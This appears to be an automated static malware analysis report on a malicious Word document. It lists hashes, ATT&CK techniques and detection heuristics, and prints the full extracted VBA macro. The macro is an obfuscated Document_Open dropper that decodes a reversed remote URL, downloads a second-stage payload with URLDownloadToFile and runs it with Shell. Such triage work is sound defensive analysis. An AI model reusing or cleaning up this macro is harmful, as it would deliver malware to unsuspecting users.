Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 162ee1723919e3af…

MALICIOUS

Office (OOXML)

176.4 KB Created: 2019-05-28 12:16:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-08-04
MD5: 96e482c25a00cd6f2e02b74a54f9d711 SHA-1: ff946f957c4b59d742c7b2875ac713e6b6922870 SHA-256: 162ee1723919e3afe7ca5d8c8a0c204b46aca0d2e8226d80af095bd9228f7d1e
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing a VBA macro. The macro is obfuscated and uses a Document_Open auto-execution technique. It leverages the URLDownloadToFile function, indicating an intent to download and execute a second-stage payload from a remote source. The ClamAV detection further confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6995980-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6995980-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    avntSV40 = -5973
Interaction.Shell@ Replace(a28IaQT(1), "GHHx", "")
Dim agtTW As Long
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Sub Document_Open()
Dim aMhg6O As Integer
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5193 bytes
SHA-256: b5a11704c1e30a19ee2ad923f35b166469ed60afd3581b561c346a5290957a97
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim aMhg6O As Integer
aMhg6O = -32086
' Critically snarl decade capitol except
Dim ajb16XoR9 As Long
ajb16XoR9 = -8022
' Department becoming antique privateer inferno motif
Dim a7gj0 As Boolean
a7gj0 = True
' Clog harm bracelets
Dim a8jWRuI As Integer
a8jWRuI = -14292
' Tapers questionable postponement
'
Dim abNBot As Boolean
abNBot = False
' Regrettable reflects oakland voiceless
Dim a9bQInm1f As Boolean
a9bQInm1f = True
' Figured
Dim aQjfn593 As Integer
aQjfn593 = -11609
' Centered
Dim atJkWGBm As Boolean
atJkWGBm = False
' Corinth
Dim aXv6fl42 As Boolean
aXv6fl42 = False
' Petiole dates therefore adverb alignment
main
End Sub

Attribute VB_Name = "arm9O"
Function a28IaQT(aGhOMJ As Long) As String
Dim aVDNWps2j As Boolean
aVDNWps2j = False
' Uncomfortably veterinary
Dim azbCc6 As String
azbCc6 = "apL8MF"
' Progenitor coop seems
Dim alcfk As Boolean
alcfk = True
a8P5EVkjy = Array("vyoHEigvyoHEipvyoHEijvyoHEi.vyoHEi1vyoHEi0vyoHEi1vyoHEi/vyoHEiuvyoHEiivyoHEihvyoHEi/vyoHEi6vyoHEi0vyoHEi/vyoHEi9vyoHEi1vyoHEi0vyoHEi2vyoHEi/vyoHEisvyoHEidvyoHEiavyoHEiovyoHEilvyoHEipvyoHEiuvyoHEi/vyoHEitvyoHEinvyoHEievyoHEitvyoHEinvyoHEiovyoHEicvyoHEi-vyoHEipvyoHEiwvyoHEi/vyoHEievyoHEivvyoHEi.vyoHEimvyoHEiovyoHEicvyoHEi.vyoHEiavyoHEigvyoHEiivyoHEilvyoHEiuvyoHEijvyoHEi/vyoHEi/vyoHEi:vyoHEisvyoHEipvyoHEitvyoHEitvyoHEihvyoHEi", "xHHGfxHHGdxHHGpxHHG.xHHG4xHHG8xHHG9xHHG\xHHGpxHHGmxHHGexHHGTxHHG\xHHGsxHHGwxHHGoxHHGdxHHGnxHHGixHHGWxHHG\xHHG:xHHGCxHHG")
Dim aQfqs0 As Long
aQfqs0 = 20113
Dim aVABHZL As Long
aVABHZL = 6395
' Storing
Dim akGyJUiab As Boolean
akGyJUiab = True
' Stan ec britney
Dim a7SdUKD As Boolean
a7SdUKD = False
a28IaQT = StrReverse(a8P5EVkjy(aGhOMJ))
End Function

Attribute VB_Name = "a54Nf63"
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Public Function aNIoyaRfB(a8K5n, aokvCR)

Dim aVhgwz As String
aVhgwz = "aHvSo"
Dim aGDXK7ywE As String
aGDXK7ywE = "arHck"
Dim alpDF As String
alpDF = "aUrdeH"
' Thieving trimmings incoherent coop
URLDownloadToFile 0, a8K5n, aokvCR, 0, 0
End Function

Attribute VB_Name = "aHoGW"
Sub main()
Dim a9N4UbvHj As Integer
a9N4UbvHj = -8122
' Grants truck simpson tankard genres crack
Dim aNmYdCVB As Long
aNmYdCVB = 20762
Dim akU1qnftK As Boolean
akU1qnftK = True
' Goblin malacca true descriptions
Dim adzmxTUw As String
adzmxTUw = "aVUEZb"
' Sources dose asia rides undivided aluminium
aNIoyaRfB Replace(a28IaQT(0), "iEHoyv", ""), Replace(a28IaQT(1), "GHHx", "")
Dim akf6gF As Boolean
akf6gF = True
' Permissions shop
Dim a90ge As Integer
a90ge = 27296
Dim aHJK5hkCq As Long
aHJK5hkCq = 9208
Dim avntSV40 As Long
avntSV40 = -5973
Interaction.Shell@ Replace(a28IaQT(1), "GHHx", "")
Dim agtTW As Long
agtTW = -7489
' Viewpicture
Dim aGrBFQ As Boolean
aGrBFQ = True
' Rockies diesel
Dim ackpex As Boolean
ackpex = False
Dim a6jPaByIn As Long
a6jPaByIn = -23473
' Palmer ann


Dim a19gHm As String
a19gHm = "aN9US"
' Zealously carnation withering synthetic argument overhead
Dim au8ZJz1Yf As Long
au8ZJz1Yf = -20349
' Quality brewed

Dim a8t6FrCnA As String
a8t6FrCnA = "abdCBr8"
Dim anegZd5fL As Long
anegZd5fL = -12652
' Corporeal quotes baghdad spar phoenicia
Dim a0APHR As String
a0APHR = "avhnGV2O"
' Russet carb condemning
End Sub

Attribute VB_Name = "aneD80Aq"
Attribute VB_Base = "0{C10CB51D-7882-47F0-9133-B9188CF65993}{5701C2EF-B767-4789-8228-80B4D07825AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Dim awAXGR5I0 As Boolean
awAXGR5I0 = True
' Bicycle teas loon upload verbs adventuress meets
Dim azhuxO As Long
azhuxO = -3223
' Tumultuously sandwich fields stats communism

Dim aXAgEtb As String
aXAgEtb = "aAQfK7tI"
' Casey tannin finite
Dim aRuDBeGU3 As Boolean
aRuDBeGU3 = True
' Strategic porter pirates
Dim aFpnJ As Integer
aFpnJ = 27270
' Baboon dead boris
Dim aSUPnYEHi As String
aSUPnYEHi = "aUuDx"
' Analyst fawning sphinx facetiously oral palm
End Sub
Public Sub test()
Dim aDeL3xWX As Boolean
aDeL3xWX = False
' Chance
Dim aynN1mXG As Long
aynN1mXG = -21769
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 34304 bytes
SHA-256: 71163b19dcd04b3c246a26cb72753ea00d906f91d9a88b21b2f4ccabc60f2a41
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.